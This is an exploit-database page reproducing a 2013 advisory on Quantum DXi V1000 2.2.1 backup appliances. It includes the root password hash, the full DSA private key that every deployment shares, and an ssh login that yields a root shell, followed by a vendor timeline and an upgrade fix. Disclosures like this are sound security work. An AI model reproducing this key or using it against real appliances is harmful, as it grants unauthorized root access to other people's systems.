header-logo
Suggest Exploit
vendor:
DXi V1000
by:
xistence
7,5
CVSS
HIGH
Default root user and Known SSH Private Key Vulnerability
N/A
CWE
Product Name: DXi V1000
Affected Version From: 2.2.1
Affected Version To: 2.2.1
Patch Exists: YES
Related CWE: N/A
CPE: a:quantum:dxi_v-series:2.2.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2013

Quantum DXi V1000 2.2.1 and below Default root user and Known SSH Private Key Vulnerability

The root user has a hardcoded password that is unknown and not changeable. Normally access is only through the restricted shells. The /etc/shadow file shows the following hash: root:$1$FGOgdWM7$dac9P0EJgTSX8a4zc4TXJ/:15783:0:99999:7::: The /root/.ssh/authorized_keys on the appliance contains the following key (same with every deployment): -----BEGIN DSA PRIVATE KEY----- MIIBugIBAAKBgQCEgBNwgF+IbMU8NHUXNIMfJ0ONa91ZI/TphuixnilkZqcuwur2 hMbrqY8Yne+n3eGkuepQlBBKEZSd8xPd6qCvWnCOhBqhkBS7g2dH6jMkUl/opX/t Rw6P00crq2oIMafR4/SzKWVW6RQEzJtPnfV7O3i5miY7jLKMDZTn/DRXRwIVALB2 +o4CRHpCG6IBqlD/2JW5HRQBAoGAaSzKOHYUnlpAoX7+ufViz37cUa1/x0fGDA/4 6mt0eD7FTNoOnUNdfdZx7oLXVe7mjHjqjif0EVnmDPlGME9GYMdi6r4FUozQ33Y5 PmUWPMd0phMRYutpihaExkjgl33AH7mp42qBfrHqZ2oi1HfkqCUoRmB6KkdkFosr E0apJ5cCgYBLEgYmr9XCSqjENFDVQPFELYKT7Zs9J87PjPS1AP0qF1OoRGZ5mefK 6X/6VivPAUWmmmev/BuAs8M1HtfGeGGzMzDIiU/WZQ3bScLB1Ykrcjk7TOFD6xrn k/inYAp5l29hjidoAONcXoHmUAMYOKqn63Q2AsDpExVcmfj99/BlpQIUYS6Hs70u B3Upsx556K/iZPPnJZE= -----END DSA PRIVATE KEY----- Using the key on a remote system to login through SSH will give a root shell.

Mitigation:

Change the default root password and remove the known SSH private key.
Source

Exploit-DB raw data:

-----------
Author:
-----------

xistence < xistence[at]0x90[.]nl >

-------------------------
Affected products:
-------------------------

Quantum DXi V1000 2.2.1 and below

-------------------------
Affected vendors:
-------------------------

Quantum
http://quantum.com/

-------------------------
Product description:
-------------------------

Quantum DXi® V-Series is a virtual deduplication backup appliance that
protects physical and
virtual data across remote sites, the datacenter and cloud deployments.

----------
Details:
----------

[ 0x01 - Default root user ]

The root user has a hardcoded password that is unknown and not changeable.
Normally access is only through the restricted shells.

The /etc/shadow file shows the following hash:
root:$1$FGOgdWM7$dac9P0EJgTSX8a4zc4TXJ/:15783:0:99999:7:::


[ 0x02 - Known SSH Private Key ]


The /root/.ssh/authorized_keys on the appliance contains the following key
(same with every deployment):

-----BEGIN DSA PRIVATE KEY-----
MIIBugIBAAKBgQCEgBNwgF+IbMU8NHUXNIMfJ0ONa91ZI/TphuixnilkZqcuwur2
hMbrqY8Yne+n3eGkuepQlBBKEZSd8xPd6qCvWnCOhBqhkBS7g2dH6jMkUl/opX/t
Rw6P00crq2oIMafR4/SzKWVW6RQEzJtPnfV7O3i5miY7jLKMDZTn/DRXRwIVALB2
+o4CRHpCG6IBqlD/2JW5HRQBAoGAaSzKOHYUnlpAoX7+ufViz37cUa1/x0fGDA/4
6mt0eD7FTNoOnUNdfdZx7oLXVe7mjHjqjif0EVnmDPlGME9GYMdi6r4FUozQ33Y5
PmUWPMd0phMRYutpihaExkjgl33AH7mp42qBfrHqZ2oi1HfkqCUoRmB6KkdkFosr
E0apJ5cCgYBLEgYmr9XCSqjENFDVQPFELYKT7Zs9J87PjPS1AP0qF1OoRGZ5mefK
6X/6VivPAUWmmmev/BuAs8M1HtfGeGGzMzDIiU/WZQ3bScLB1Ykrcjk7TOFD6xrn
k/inYAp5l29hjidoAONcXoHmUAMYOKqn63Q2AsDpExVcmfj99/BlpQIUYS6Hs70u
B3Upsx556K/iZPPnJZE=
-----END DSA PRIVATE KEY-----

Using the key on a remote system to login through SSH will give a root
shell:

$ ssh -i quantum.key root@192.168.2.117
Last login: Mon Sep 23 21:27:19 2013 from 192.168.2.71

Product Model          = DXiV1000
Hardware Configuration = V1000
System Version         = 2.2.1_MC
Base OS Version        = 2.2.1_MC-9499
Application Version    = 2.2.1_MC-50278
SCM Build Version      = Build14
Kernel Version         = 2.6.18-164.15.1.qtm.4

[root@DXi000C29FB1EA1 ~]# id
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),103(adic)


-----------
Solution:
-----------

Upgrade to version 2.3.0.1 or newer

--------------
Timeline:
--------------

30-09-2013 - Issues discovered and vendor notified
30-09-2013 - Reply from vendor asking for more details
01-10-2013 - Supplied more details how to replicate
19-11-2013 - Asked for status update
19-11-2013 - Reply from vendor that an updated release is due for March 2014
xx-xx-2014 - Quantum DXi V1000 2.3.0.1 released
17-03-2014 - Public disclosure

Navigation

Suggest Exploit

Services By CQR